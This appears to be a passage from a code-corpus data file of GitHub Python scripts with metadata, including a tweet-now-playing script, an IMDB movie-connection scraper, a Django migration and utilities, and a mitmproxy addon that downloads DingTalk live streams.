"app2.models.Product", "line_number": 145, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 146, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 146, "usage_type": "name"}, {"api_name": "re.template.render", "line_number": 147, "usage_type": "call"}, {"api_name": "re.template", "line_number": 147, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 174, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 185, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 186, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 191, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 215, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 236, "usage_type": "call"}]} +{"seq_id": "40592916448", "text": "#!/usr/bin/env python3.5\n\nfrom objc_util import *\nimport twitter\nimport dialogs\n\n# Music Controller\n\nMPController = ObjCClass('MPMusicPlayerController')\nplayer = MPController.systemMusicPlayer()\nnowPlaying = player.nowPlayingItem()\n\n# Twitter setup\n\ntAccts = twitter.get_all_accounts()\nif len(tAccts) >= 1:\n\tacct = tAccts[0]\nelse:\n\tNone\n\n# Return artist/song, post\n\nif nowPlaying:\n\tartist = nowPlaying.valueForProperty_('artist')\n\ttitle = nowPlaying.valueForProperty_('title')\n\n\tNP = '#NowPlaying: %s - \"%s\"' % (artist, title)\n\t\n\tcheckPost = dialogs.alert('#NowPlaying', 'Currently playing: %s - \"%s\"' % (artist, title) + '. Tweet it?', 'Nope', 'Tweet', hide_cancel_button=True)\n\t\n\tif checkPost == 2:\n\t\ttwitter.post_tweet(acct, NP)\n\t\tdialogs.alert('#NowPlaying', 'Posted', 'Okay', hide_cancel_button=True)\n\telif checkPost == 1:\n\t\tdialogs.alert('#NowPlaying', 'Canceled', 'Okay', hide_cancel_button=True)\n", "repo_name": "bvon/NowPlaying", "sub_path": "NowPlaying.py", "file_name": "NowPlaying.py", "file_ext": "py", "file_size_in_byte": 904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "twitter.get_all_accounts", "line_number": 15, "usage_type": "call"}, {"api_name": "dialogs.alert", "line_number": 29, "usage_type": "call"}, {"api_name": "twitter.post_tweet", "line_number": 32, "usage_type": "call"}, {"api_name": "dialogs.alert", "line_number": 33, "usage_type": "call"}, {"api_name": "dialogs.alert", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "20500628387", "text": "\"\"\"\nA script that finds the connections of a movie and sorts them according to\ntheir ranking.\n\"\"\"\nfrom movies import *\nfrom requests import Session\nimport cProfile\nimport pstats\nimport sys\nimport httpx\nimport asyncio\nimport csv\n\n\nsmovies = set()\nuactors = set()\n\nwith open('history.csv', newline = '') as f:\n data = csv.reader(f)\n for row in data:\n smovies.add(row[0].strip())\n uactors.add(row[1].strip())\n\n\nasync def get_connections(movie):\n \"\"\"\n Get a set of movie codes that connect with a given movie.\n\n Input:\n - movie: A movie code from which a movies.Movie() object can be created.\n\n Outpt:\n - c: a set() of connections.\n \"\"\"\n movie = Movie(movie)\n movie.get_cast()\n print(movie.name)\n cast = set(movie.cast_urls)\n available = cast - uactors\n\n c = set()\n\n url = 'https://www.imdb.com/name/{}/?req_=fn_al_1'\n header = {'Accept-Language': 'en-US'}\n\n async with httpx.AsyncClient() as client:\n #tasks = (Actor(code) for code in movie.cast_urls)\n tasks = 
        reqs = await asyncio.gather(*tasks)\n\n    actors = [Actor(html = resp.content) for resp in reqs]\n    for actor in actors:\n        #print(actor.name)\n        actor.extract_movies()\n        for k, v in actor.jobs.items():\n            c.add(k)\n    c = c - smovies\n\n    return c\n\n\nasync def sort_connections(movie_set):\n    \"\"\"\n    Sort a set of movie codes according to their movie scores in IMDB.\n\n    Input:\n    - movie_set: A set of movie codes.\n\n    Output:\n    - movies: a list of Movie objects sorted by score.\n    \"\"\"\n    url = 'https://www.imdb.com/title/{}/?req_=fn_al_1'\n    header = {'Accept-Language': 'en-US'}\n    movie_set = list(movie_set)\n    movies = []\n    ii = 1\n\n    while movie_set:\n        print(f'On round {ii}.')\n        cs = 5\n        cms = movie_set[:cs]\n        del movie_set[:cs]\n        async with httpx.AsyncClient() as client:\n            tasks = (client.get(url.format(code), headers = header) for code in cms)\n            reqs = await asyncio.gather(*tasks)\n        cmovies = [Movie(html = resp.content) for resp in reqs]\n        movies.extend(cmovies)\n        ii += 1\n    print('Finished making movies.')\n\n    #movies = [Movie(html = resp.content) for resp in reqs]\n    for movie in movies:\n        #print(movie.name)\n        movie.get_score()\n\n    movies.sort()\n    print(movies)\n    return movies\n\n\ndef writeout(movie_set):\n    \"\"\"\n    Write out the connections as a file with two columns, indicating name and\n    ranking.\n    \"\"\"\n    with open(\"possibilities.txt\", \"w\") as f:\n        f.write(\"Title, Score\\n\")\n        for movie in movie_set:\n            f.write(f\"{movie.name}, {movie.score}\\n\")\n\ndef main():\n    movie = sys.argv[1]\n\n    with cProfile.Profile() as pr:\n        conn_set = asyncio.run(get_connections(movie))\n        #conn_set = set(list(conn_set)[:10])\n        conn_set = asyncio.run(sort_connections(conn_set))\n    \n    stats = pstats.Stats(pr)\n    stats.sort_stats(pstats.SortKey.TIME)\n    stats.dump_stats(filename = 'conn.prof')\n\n    writeout(conn_set)\n\n\nif __name__ == '__main__':\n    main()\n\n", "repo_name": "rodrigo-moreno/movie_net", "sub_path": "get_connections.py", "file_name": "get_connections.py", "file_ext": "py", "file_size_in_byte": 3122, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 19, "usage_type": "call"}, {"api_name": "httpx.AsyncClient", "line_number": 46, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 49, "usage_type": "call"}, {"api_name": "httpx.AsyncClient", "line_number": 83, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 85, "usage_type": "call"}, {"api_name": "movies.extend", "line_number": 87, "usage_type": "call"}, {"api_name": "movies.sort", "line_number": 96, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 112, "usage_type": "attribute"}, {"api_name": "cProfile.Profile", "line_number": 114, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 115, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 117, "usage_type": "call"}, {"api_name": "pstats.Stats", "line_number": 119, "usage_type": "call"}, {"api_name": "pstats.SortKey", "line_number": 120, "usage_type": "attribute"}]} +{"seq_id": "73829928166", "text": "import os\nimport platform\nimport sys\nimport argparse\n\nimport Utils.IO\nfrom Utils.Path import getPathVar\nfrom Shell.Shell import getShell\nimport Parser\nimport Actions\n\ndef printHelp():\n    pout = Utils.IO.printErr\n    pout(\"(Python) Environment Modules\")\n    pout(\"Version 0.1\")\n    pout(\"http://github.com/lrm29/pythonEnvModules\")\n\ndef main(args):\n    try:\n        parser = 
argparse.ArgumentParser(description=\"Load environment to terminal\")\n parser.add_argument(\"--shell\", dest=\"shellType\", help=\"Specify the shell type\")\n parser.add_argument(\"actionType\", nargs=1, help=\"Action to perform\")\n parser.add_argument(\"moduleFile\", nargs='?', default='', help=\"Module file to read in\")\n parser.add_argument(\"moduleFileSwap\", nargs='?', default='', help=\"Module file to swap with\")\n args = parser.parse_args()\n\n shell = getShell(args.shellType)\n action = args.actionType[0]\n\n # Print help message\n if action.startswith(\"h\"):\n printHelp()\n return 0\n\n # Process actions\n if action.startswith(\"li\"):\n actionList = Actions.List()\n\n elif action.startswith(\"av\"):\n actionAvailable = Actions.Available()\n\n elif action.startswith(\"wh\"):\n specificModuleFile = args.moduleFile\n actionAvailable = Actions.WhatIs(specificModuleFile)\n\n elif action.startswith(\"sh\"):\n moduleFile = args.moduleFile\n variableData = Parser.VariableData()\n actionShow = Actions.Show(shell, variableData, moduleFile)\n\n elif action.startswith(\"use\"):\n pathToUse = args.moduleFile\n actionUse = Actions.Use(\"ENV_MODULES_PATH\", pathToUse, shell)\n\n elif action.startswith(\"unuse\"):\n pathToUnUse = args.moduleFile\n actionUnuse = Actions.Unuse(\"ENV_MODULES_PATH\", pathToUnUse, \"ENV_MODULES_LOADED\", shell)\n\n elif action.startswith(\"load\"):\n moduleFile = args.moduleFile\n variableData = Parser.VariableData()\n actionLoad = Actions.Load(shell, variableData, moduleFile)\n\n elif action.startswith(\"unload\"):\n moduleFile = args.moduleFile\n variableData = Parser.VariableData()\n actionUnload = Actions.Unload(shell, variableData, moduleFile)\n\n elif action.startswith(\"sw\"):\n moduleFileToUnload = args.moduleFile\n variableData = Parser.VariableData()\n actionUnload = Actions.Unload(shell, variableData, moduleFileToUnload)\n\n moduleFileToLoad = args.moduleFileSwap\n variableData = Parser.VariableData()\n actionLoad = Actions.Load(shell, variableData, moduleFileToLoad)\n\n elif action.startswith(\"re\"):\n moduleFileToUnload = args.moduleFile\n variableData = Parser.VariableData()\n actionUnload = Actions.Unload(shell, variableData, moduleFileToUnload)\n\n moduleFileToLoad = args.moduleFile\n variableData = Parser.VariableData()\n actionLoad = Actions.Load(shell, variableData, moduleFileToLoad)\n\n else:\n Utils.IO.printErr(\"Unknown action \" + action)\n return 1\n\n except:\n return 1 # exit on error\n else:\n return 0 # exit errorlessly\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n\n", "repo_name": "lrm29/pythonEnvModules", "sub_path": "src/pythonenvmodules.py", "file_name": "pythonenvmodules.py", "file_ext": "py", "file_size_in_byte": 3362, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Utils.IO.IO", "line_number": 13, "usage_type": "attribute"}, {"api_name": "Utils.IO", "line_number": 13, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 20, "usage_type": "call"}, {"api_name": "Shell.Shell.getShell", "line_number": 27, "usage_type": "call"}, {"api_name": "Actions.List", "line_number": 37, "usage_type": "call"}, {"api_name": "Actions.Available", "line_number": 40, "usage_type": "call"}, {"api_name": "Actions.WhatIs", "line_number": 44, "usage_type": "call"}, {"api_name": "Parser.VariableData", "line_number": 48, "usage_type": "call"}, {"api_name": "Actions.Show", "line_number": 49, "usage_type": "call"}, {"api_name": 
"Actions.Use", "line_number": 53, "usage_type": "call"}, {"api_name": "Actions.Unuse", "line_number": 57, "usage_type": "call"}, {"api_name": "Parser.VariableData", "line_number": 61, "usage_type": "call"}, {"api_name": "Actions.Load", "line_number": 62, "usage_type": "call"}, {"api_name": "Parser.VariableData", "line_number": 66, "usage_type": "call"}, {"api_name": "Actions.Unload", "line_number": 67, "usage_type": "call"}, {"api_name": "Parser.VariableData", "line_number": 71, "usage_type": "call"}, {"api_name": "Actions.Unload", "line_number": 72, "usage_type": "call"}, {"api_name": "Parser.VariableData", "line_number": 75, "usage_type": "call"}, {"api_name": "Actions.Load", "line_number": 76, "usage_type": "call"}, {"api_name": "Parser.VariableData", "line_number": 80, "usage_type": "call"}, {"api_name": "Actions.Unload", "line_number": 81, "usage_type": "call"}, {"api_name": "Parser.VariableData", "line_number": 84, "usage_type": "call"}, {"api_name": "Actions.Load", "line_number": 85, "usage_type": "call"}, {"api_name": "Utils.IO.IO.printErr", "line_number": 88, "usage_type": "call"}, {"api_name": "Utils.IO.IO", "line_number": 88, "usage_type": "attribute"}, {"api_name": "Utils.IO", "line_number": 88, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 98, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 98, "usage_type": "attribute"}]} +{"seq_id": "73475836966", "text": "from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nfrom mail import views\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'cloudmail.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^$', views.home),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^test/$', views.test),\n url(r'^search/', views.result),\n\n)\n", "repo_name": "IceCoffee2013/cloudmail", "sub_path": "urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 422, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "mail.views.home", "line_number": 13, "usage_type": "attribute"}, {"api_name": "mail.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 14, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "mail.views.test", "line_number": 15, "usage_type": "attribute"}, {"api_name": "mail.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "mail.views.result", "line_number": 16, "usage_type": "attribute"}, {"api_name": "mail.views", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "12648986451", "text": "\"\"\"add table channel_type\n\nRevision ID: 11f1722d941f\nRevises: 22ced1088b04\nCreate Date: 2015-06-22 09:55:39.004203\n\n\"\"\"\n\n# revision 
identifiers, used by Alembic.\nrevision = '11f1722d941f'\ndown_revision = '22ced1088b04'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\nimport uuid\nfrom datetime import datetime\n\nchannel_type_enum = sa.Enum('web', 'sms', 'email', 'mobile', 'notification', 'twitter', 'facebook', name='channel_type_enum')\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n channel_type_enum.create(op.get_bind(), True)\n op.create_table('channel_type',\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.Column('id', postgresql.UUID(), nullable=False),\n sa.Column('channel_id', postgresql.UUID(), nullable=True),\n sa.ForeignKeyConstraint(['channel_id'], [u'channel.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.add_column('channel_type', sa.Column('name', channel_type_enum, nullable=False, server_default='web', index=True))\n op.create_index('ix_channel_type_name', 'channel_type', ['name'], unique=False)\n connection = op.get_bind()\n\n result = connection.execute('select id from channel')\n for row in result:\n for type in channel_type_enum.enums:\n op.execute(\"INSERT INTO channel_type (created_at, id, channel_id, name) VALUES ('{}','{}', '{}','{}')\".\n format(datetime.utcnow(), str(uuid.uuid1()), row['id'], type))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('ix_channel_type_name', 'channel_type')\n op.drop_table('channel_type')\n channel_type_enum.drop(op.get_bind())\n ### end Alembic commands ###\n", "repo_name": "dvdn/Chaos", "sub_path": "migrations/versions/11f1722d941f_.py", "file_name": "11f1722d941f_.py", "file_ext": "py", "file_size_in_byte": 1836, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlalchemy.Enum", "line_number": 19, "usage_type": "call"}, {"api_name": "alembic.op.get_bind", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.op.create_table", "line_number": 24, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 24, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql.UUID", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql.UUID", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": 
"alembic.op.create_index", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 33, "usage_type": "name"}, {"api_name": "alembic.op.get_bind", "line_number": 34, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 34, "usage_type": "name"}, {"api_name": "alembic.op.execute", "line_number": 39, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 39, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "name"}, {"api_name": "uuid.uuid1", "line_number": 40, "usage_type": "call"}, {"api_name": "alembic.op.drop_index", "line_number": 46, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 46, "usage_type": "name"}, {"api_name": "alembic.op.drop_table", "line_number": 47, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 47, "usage_type": "name"}, {"api_name": "alembic.op.get_bind", "line_number": 48, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 48, "usage_type": "name"}]} +{"seq_id": "31695079533", "text": "from django.db.models import CASCADE\n\n\ndef CONDITIONAL_CASCADE(collector, field, sub_objs, using, **kwargs):\n \"\"\"\n Django deletion constraint that is a combination of CASCADE and SET.\n If condition (which is a dict of lookup arguemnts) is True then CASCADE\n is used, otherwise SET(default_value) is used.\n\n \"condition\" & \"default_value\" can be provided via `functools.partial` like this:\n ```\n my_field = models.ForeignKey(\n my_thing,\n on_delete=functools.partial(\n CONDITIONAL_CASCADE,\n condition={\"some_lookup_arg\": \"some_value\"},\n default_value=None,\n )\n )\n ```\n \"\"\"\n\n condition = kwargs[\"condition\"]\n default_value = kwargs.get(\"default_value\", None)\n\n sub_objs_to_cascade = sub_objs.filter(**condition)\n sub_objs_to_set = sub_objs.exclude(**condition)\n\n CASCADE(collector, field, sub_objs_to_cascade, using)\n collector.add_field_update(field, default_value, sub_objs_to_set)\n\n\ndef bulk_update_or_create(model_class, model_data, comparator_fn=None):\n \"\"\"\n Performs update_or_create in bulk (w/ only 3 db hits)\n Parameters\n ----------\n model_class : django.db.models.Model\n model to update_or_create\n model_data : list\n data to update/create. 
Example: [{'field1': 'value', 'field2': 'value'}, ...]\n comparator_fn: function\n a function that compares a model instance w/ model data to determine if it needs to be updated\n Returns\n -------\n tuple\n the number of objects created & updated\n \"\"\"\n\n # get all instances of the model...\n existing_objects = list(model_class.objects.all())\n\n # get all the fields that uniquely identify a model object...\n # TODO: deal w/ unique_together fields\n unique_field_names = [\n field.name for field in model_class._meta.get_fields()\n if field.concrete and not field.primary_key and field.unique\n ]\n all_data_record_field_names = set()\n\n objects_to_create = []\n objects_to_update = []\n\n for data_record in model_data:\n\n # for every dictionary in model_data,\n # extract the fields that can uniquely identify an object,\n # and check if there is an existing object w/ those values,\n # if so (and if the comparator_fn fails) update that object w/ the field values and store it to be UPDATED,\n # then remove it from the list of existing objects (so the next time around the check is faster),\n # if not store it to be CREATED\n\n all_data_record_field_names.update(data_record.keys())\n unique_data_record_fields = {\n # raises a KeyError if data doesn't include unique_fields\n field_name: data_record[field_name]\n for field_name in unique_field_names\n }\n\n matching_object = next(\n (\n obj for obj in existing_objects if all([\n getattr(obj, k) == v for k,\n v in unique_data_record_fields.items()\n ])\n ),\n None,\n )\n if matching_object:\n if comparator_fn is None or not comparator_fn(\n matching_object, data_record\n ):\n for k, v in data_record.items():\n setattr(matching_object, k, v() if callable(v) else v)\n objects_to_update.append(matching_object)\n existing_objects.remove(matching_object)\n else:\n objects_to_create.append(model_class(**data_record))\n\n all_data_record_field_names.remove(*unique_field_names)\n\n model_class.objects.bulk_create(objects_to_create)\n model_class.objects.bulk_update(\n objects_to_update, all_data_record_field_names\n )\n\n # returns a tuple of created objects & updated objects\n return (objects_to_create, objects_to_update)\n", "repo_name": "astrosat/django-astrosat-core", "sub_path": "astrosat/utils/utils_db.py", "file_name": "utils_db.py", "file_ext": "py", "file_size_in_byte": 3829, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.models.CASCADE", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "5884707163", "text": "import mitmproxy.http\nimport re\nimport os\nimport tempfile\nif os.name==\"nt\":\n executefile=\"n-m3u8dl-re.exe\"\nelse:\n executefile=\"n-m3u8dl-re\"\ndef response(flow:mitmproxy.http.HTTPFlow):\n # If the request host matches \"dtliving-*.dingtalk.com\"\n if flow.request.method==\"GET\" and re.match(r'dtliving-.+\\.dingtalk\\.com',flow.request.host) and re.match(\n r\"/live_hp/([a-zA-Z0-9-]+)_normal\\.m3u8\\?auth_key=([a-zA-Z0-9-]+)\",flow.request.path):\n # Write the content to the temporary file path obtained from tempfile, overwriting on each write; the file is created if it does not exist\n tmpfile_path=tempfile.mkstemp(\".m3u8\",\"dingtalk-live-downloader\")[1]\n with open(tmpfile_path,\"w+\") as f:\n f.write(flow.response.content.decode(\"utf-8\"))\n # Call n-m3u8dl-re-bin to download.\n os.system(executefile+r\" \"+tmpfile_path+\" --base-url https://\"+flow.request.host+r\"/live_hp/ --save-dir . 
--save-name \"+re.match(\n r\"/live_hp/([a-zA-Z0-9-]+)_normal\\.m3u8\\?auth_key=([a-zA-Z0-9-]+)\",flow.request.path).group(1)+r\".mp4 --no-log \")\n #删除临时文件\n os.remove(tmpfile_path)", "repo_name": "chinese-wzq/dingtalk-live-downloader", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1108, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.name", "line_number": 5, "usage_type": "attribute"}, {"api_name": "mitmproxy.http.http", "line_number": 9, "usage_type": "attribute"}, {"api_name": "mitmproxy.http", "line_number": 9, "usage_type": "name"}, {"api_name": "re.match", "line_number": 11, "usage_type": "call"}, {"api_name": "tempfile.mkstemp", "line_number": 14, "usage_type": "call"}, {"api_name": "os.system", "line_number": 18, "usage_type": "call"}, {"api_name": "re.match", "line_number": 18, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "32764228185", "text": "# Personal Test Number 1\n# Many of these examples have left me wanting sliders to manipulate parameters\n# in realtime. OpenCV has a module for just such a feature.\n# My first personal test is to create a small program that implements two track-\n# bar sliders which affect the first and second thresholds in Canny detection.\n\nimport cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\nwindow = 'Variable Canny'\nthresh1 = 0\nthresh2 = 0\nthreshMax = 500\n\ndef slideOne(val):\n global thresh1\n thresh1 = val\n\ndef slideTwo(val):\n global thresh2\n thresh2 = val\n\ncv2.namedWindow(window)\n\ncv2.createTrackbar('Thresh1', window, 0, threshMax, slideOne)\ncv2.createTrackbar('Thresh2', window, 0, threshMax, slideTwo)\n\nwhile(1):\n _, frame = cap.read()\n\n canny = cv2.Canny(frame, thresh1, thresh2)\n cv2.imshow(window, canny)\n k = cv2.waitKey(5) & 0xFF\n if k==27:\n break\n\ncv2.destroyAllWindows()\ncap.release()\n", "repo_name": "sosatchley/Explorations_OpenCV", "sub_path": "Tests/Test01.py", "file_name": "Test01.py", "file_ext": "py", "file_size_in_byte": 928, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.VideoCapture", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.Canny", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "857148269", "text": "from os import listdir\nimport random\nimport sys\nimport machine\nimport ubinascii\nfrom Enviroment import Enviroment\nfrom utils.Logger import Logger\n\nclass __Device: \n def __init__(self):\n if not hasattr(machine, \"unique_id\"):\n raise(OSError(\"Unable to detect hardware id\"))\n\n @property\n def serial_no(self):\n return ubinascii.b2a_base64(machine.unique_id())\n\n def soft_reset(self):\n sys.exit()\n\n def hard_reset(self):\n machine.reset()\n \n async def update(self): \n \"\"\"\n Attempt to assign the LED pin id's, if invalid_pin, ignore the pin otherwise set to update queue\n if any pins have been loaded, update pin state using pin callback.\n \"\"\"\n 
pins = []\n setters = [(Enviroment.WIFI_LED_PIN, lambda pin: pin.value(int(Wifi.wifi_connected))), (Enviroment.ADHOC_LED_PIN, lambda pin: pin.value(int(Wifi.adhoc_ip_adress is not None)))]\n for id, callback in setters:\n newVal = None\n try:\n newVal = (machine.Pin(id, machine.Pin.OUT), callback)\n except ValueError as e:\n if e.errno == \"invalid pin\":\n if id == Enviroment.WIFI_LED_PIN:\n Logger.error(self, \"Failed to setup wifi led pin: (Invalid enviroment -> WIFI_LED_PIN value)\")\n elif id == Enviroment.ADHOC_LED_PIN:\n Logger.error(self, \"Failed to setup adhoc led pin: (Invalid enviroment -> ADHOC_LED_PIN value)\")\n elif Enviroment.DEBUG_MODE:\n raise(e)\n finally: \n if newVal is not None:\n pins.append(newVal)\n \n del(setters) # Remove setter stack, possibly chugs up memory due occasional infinite loop\n while len(pins):\n for pin, callback in pins:\n callback(pin)\n \n await uasyncio.sleep_ms(1000)\n \n\nDevice = __Device()", "repo_name": "SlimmiiProject/MicroProcessorController", "sub_path": "Python (deprecated)/utils/Device.py", "file_name": "Device.py", "file_ext": "py", "file_size_in_byte": 1993, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "ubinascii.b2a_base64", "line_number": 16, "usage_type": "call"}, {"api_name": "machine.unique_id", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 19, "usage_type": "call"}, {"api_name": "machine.reset", "line_number": 22, "usage_type": "call"}, {"api_name": "Enviroment.Enviroment.WIFI_LED_PIN", "line_number": 30, "usage_type": "attribute"}, {"api_name": "Enviroment.Enviroment", "line_number": 30, "usage_type": "name"}, {"api_name": "Enviroment.Enviroment.ADHOC_LED_PIN", "line_number": 30, "usage_type": "attribute"}, {"api_name": "machine.Pin", "line_number": 34, "usage_type": "call"}, {"api_name": "Enviroment.Enviroment.WIFI_LED_PIN", "line_number": 37, "usage_type": "attribute"}, {"api_name": "Enviroment.Enviroment", "line_number": 37, "usage_type": "name"}, {"api_name": "utils.Logger.Logger.error", "line_number": 38, "usage_type": "call"}, {"api_name": "utils.Logger.Logger", "line_number": 38, "usage_type": "name"}, {"api_name": "Enviroment.Enviroment.ADHOC_LED_PIN", "line_number": 39, "usage_type": "attribute"}, {"api_name": "Enviroment.Enviroment", "line_number": 39, "usage_type": "name"}, {"api_name": "utils.Logger.Logger.error", "line_number": 40, "usage_type": "call"}, {"api_name": "utils.Logger.Logger", "line_number": 40, "usage_type": "name"}, {"api_name": "Enviroment.Enviroment.DEBUG_MODE", "line_number": 41, "usage_type": "attribute"}, {"api_name": "Enviroment.Enviroment", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "10702155529", "text": "#!/home/rafael/anaconda3/bin/python\n\nimport argparse\nimport os\nimport math\nimport numpy as np\nimport liveplot as lp\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.transforms as transforms\nimport tqdm\n\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torchvision.utils import save_image\n\nos.makedirs(\"images\", exist_ok=True)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--n_epochs\", type=int, default=200, help=\"number of epochs of training\")\nparser.add_argument(\"--batch_size\", type=int, default=64, help=\"size of the batches\")\nparser.add_argument(\"--lr\", type=float, default=0.0002, help=\"adam: learning 
rate\")\nparser.add_argument(\"--b1\", type=float, default=0.5, help=\"adam: decay of first order momentum of gradient\")\nparser.add_argument(\"--b2\", type=float, default=0.999, help=\"adam: decay of first order momentum of gradient\")\nparser.add_argument(\"--n_cpu\", type=int, default=8, help=\"number of cpu threads to use during batch generation\")\nparser.add_argument(\"--latent_dim\", type=int, default=100, help=\"dimensionality of the latent space\")\nparser.add_argument(\"--img_size\", type=int, default=28, help=\"size of each image dimension\")\nparser.add_argument(\"--channels\", type=int, default=1, help=\"number of image channels\")\nparser.add_argument(\"--sample_interval\", type=int, default=400, help=\"interval betwen image samples\")\nopt = parser.parse_args()\nprint(opt)\n\nimg_shape = (opt.channels, opt.img_size, opt.img_size)\n\ncuda = True if torch.cuda.is_available() else False\n\nclass Generator(nn.Module):\n def __init__(self):\n super(Generator, self).__init__()\n\n def block(in_feat, out_feat, normalize=True):\n layers = [ nn.Linear(in_feat, out_feat) ]\n if normalize: \n 